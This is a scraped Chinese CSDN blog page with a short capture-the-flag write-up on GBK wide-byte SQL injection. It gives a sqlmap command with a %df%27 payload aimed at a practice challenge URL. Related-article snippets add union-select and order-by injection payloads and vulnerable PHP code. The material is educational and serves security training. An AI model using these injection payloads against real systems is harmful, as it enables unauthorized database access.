gbk injection

最新推荐文章于 2020-02-10 15:36:30 发布
最新推荐文章于 2020-02-10 15:36:30 发布
阅读量956 收藏 3
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42419856/article/details/82871497
版权

以下是我在南邮上做的一道宽字节注入题,先将笔记总结于下,题目:

  将网址复制下来,因为这将是我们进行注入的数据库的位置所在,因为该题提示是gbk数据库,所以咱们就有利用宽字节注入来解题的思路,接下来咱们用到sql注入工具的一款,sqlmap:

首先我们需要爆出数据库命令如下(爆出当前数据库(%df%27是双字节不转义单引号实现注入的方法--原理我会另外总结一片笔记出来链接:https://blog.csdn.net/weixin_42419856/article/details/82872653)):

python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --current-db

 爆出的结果如下:

最低0.47元/天 解锁文章
sworddancing
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CG-CTF GBK Injection
venu_s的博客
11-03 344
CG-CTF WEB GBK Injection
CG CTF GBK Injection
qq_46389295的博客
02-23 192
题目链接 GBK Injection想到宽字节注入,首先了解宽字节注入的原理 http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order by 2# 发现#被过滤掉了,遂使用%23(url编码) http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order b...
CGCTF——GBK Injection
知足且坚定,温柔且上进
02-10 414
该题提示是gbk数据库,所以咱们就有利用宽字节注入来解题的思路。 (%df%27是双字节不转义单引号实现注入的方法) 原理参考:https://blog.csdn.net/weixin_42419856/article/details/82872653 参考2:https://lyiang.wordpress.com/2015/06/09/sql%E6%B3%A8%E5%85%A5%EF%BC%...
CG-CTF-Web-GBK Injection
1stPeak's Blog
07-01 1278
GBK Injection 1.题目 2.首先我们进入题目地址,发现下图所示,首先猜测可能存在sql注入 3.于是我们尝试',但被转义了 4.被转义了,那咋办,此时,想到了URL中%df与\结合会变成運,如下图 5.因此我们可以闭合id的值,使用#,--空格或--+来注释最后一个’ 这里对#进行了过滤,但我们可以使用%23进行绕过 –空格也是标准的SQl注释语句,但这里对空格进行了过滤,...
CGCTTF-GBK Injection
weixin_43803070的博客
05-13 352
查看题目给的信息,一看就知道是宽字节注入啦。 http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1�' 页面报错 判断字段,4的时候报错: http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1�' order by 4--+ 2的时候,回显正常: http://chinalover.sina...
gbk转码文件
04-26
gbk转码文件。将其他字符转化为gbk,配合小程序蓝牙使用
gbk2unicode
04-22
js数组,可以修改扩展名为js ,gbk2unicode 码表js数组
GBK.rar_GBK
09-14
GBK编码是中国大陆广泛使用的汉字编码标准,全称为“汉字内码扩展规范”(GB 18030-2000)。它是在GBK的基础上增加了对Unicode字符集的支持,能够表示20902个汉字以及其他多种语言的文字。GBK编码在ASCII的基础上...
url编码gbk格式
10-13
GBK编码的URL编码过程就是将GBK字符转换为%xx形式的百分号编码,其中xx代表该字符在GBK编码中的16进制值。 本压缩包文件提供了两个工具类,用于对GBK格式的字符串进行URL编码。这两个工具类可能分别采用了不同的...
GBK编码规则.zip
05-08
GBK编码是中国大陆广泛使用的汉字编码标准之一,它在GB2312的基础上进行了扩展,以容纳更多的汉字和其他字符。GB2312是1980年制定的基础汉字编码标准,主要涵盖了常用的一级和二级汉字,大约6763个汉字。然而,随着...
gbk双字节注入
左手诗人 右手剑客
06-12 361
<?php //连接数据库部分,注意使用了gbk编码 $conn = mysql_connect('localhost', 'root', 'toor!@#$') or die('bad!'); mysql_query("SET NAMES 'gbk'"); mysql_select_db('test', $conn) OR emMsg("连接数据库失败,未找到您填写的数据库");...
利用GBK双字节编码突破PHP单引号转义限制进行SQL注入:set names gbk导致的sql注入...
weixin_34348805的博客
08-28 88
<?php $conn = mysql_connect('localhost','root','')or die("<font color=red>不能连接数据库!</font>"); $db = mysql_select_db('test',$conn); mysql_query("set names 'gbk'");//如果是这行,就可以注入了 /...
南邮宽字节(sql_gbk)注入
Cosmopolitan的博客
08-28 948
首先题目过滤了单引号,先绕过,用%d6%27来绕过,构成一个宽字节,取消了单引号的转义,直接上sqlmap 爆数据库: python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --current-db 爆表名: python sqlmap.py -u "http://chinalove...
利用GBK双字节编码突破PHP单引号转义限制进行SQL注入
weixin_30764137的博客
04-20 101
利用GBK双字节编码突破PHP单引号转义限制进行SQL注入 日期:2010-10-18| 来源:redice's Blog| 作者:redice| 305 人围观| 0 人鼓掌了! 今天看了黑防2009精华本下册《双字节编码:PHP的隐形杀手》一文,深受启发。 当php.ini中magic_quo...
CG-CTF GBKinject
热门推荐
单核CPU的小朋友的博客
11-26 3万+
题目地址:http://chinalover.sinaapp.com/SQL-GBK/index.php 首先观察源代码,发现是gbk编码,考虑到GBK INJECT 题目没有做任何过滤。 爆库名: http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,database()%23 库名:...
gbk字符编码和宽字节sql注入
sworddancing is the best one
09-27 2546
ctf题目中宽字节注入是很常见的问题,我这篇文章的目的就是弄明白其中的原理。 通常来说,一个gbk编码的汉字通常占用两个字节,一个utf-8编码汉字,占用三个字节, 占用3个字节。在php中,我们可以通过输出 echo strlen("和"); 来测试。当将页面编码保存为gbk时输出2,utf-8时输出3。   说了这么多废话,现在来研究一下在SQL注入中,gbk字符编码带来的各种...
CG CTF WEB GBK Injection
无限迭代中......
07-02 461
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1 题解: ctf4表里有个假flag 1、 id=1%df' and 1=2 %23 2、 id=1%df' order by 2 %23 3、 id=1%df' and 1=2 union select 1,2 %23 4、 id=1%df' and 1=2 uni...
MySQL 宽字节注入——关于GBK编码和UTF-8编码
公众号shadow sock7
04-02 5031
参考: http://blog.csdn.net/jnbbwyth/article/details/6991425 https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html这个文件原文只有ASCII字符,当我加上两个汉字之后就不得不变成了UTF-8字符。 iconv这个工具(MacOS, ubuntu和kali好像是自带的)
南邮CTF injection-3 宽字节注入
include_heqile的博客
03-22 3041
从昨天晚上开始做的,结果踩了一个坑,干到了凌晨1点,电脑都自动关机了,也没做出来,电脑关机之后,又用手机查了一下,知道了应该用表名的16进制形式来进行爆表,然后到今天上午才做完,还是上计组的时候用手机的火狐做的,手机做是真的难受宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码表名库名的十六进制形式: 字符形式的表名: ctf表示成十...
GBK和unicode
最新发布
06-05
GBK和Unicode都是字符集编码方式。GBK是一种中文字符集编码,其中包含了大量的中文汉字,它是由国家标准局发布的,是国家规定的汉字字符集编码。而Unicode则是一种国际字符集编码,包括了全世界所有的字符,包括各种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值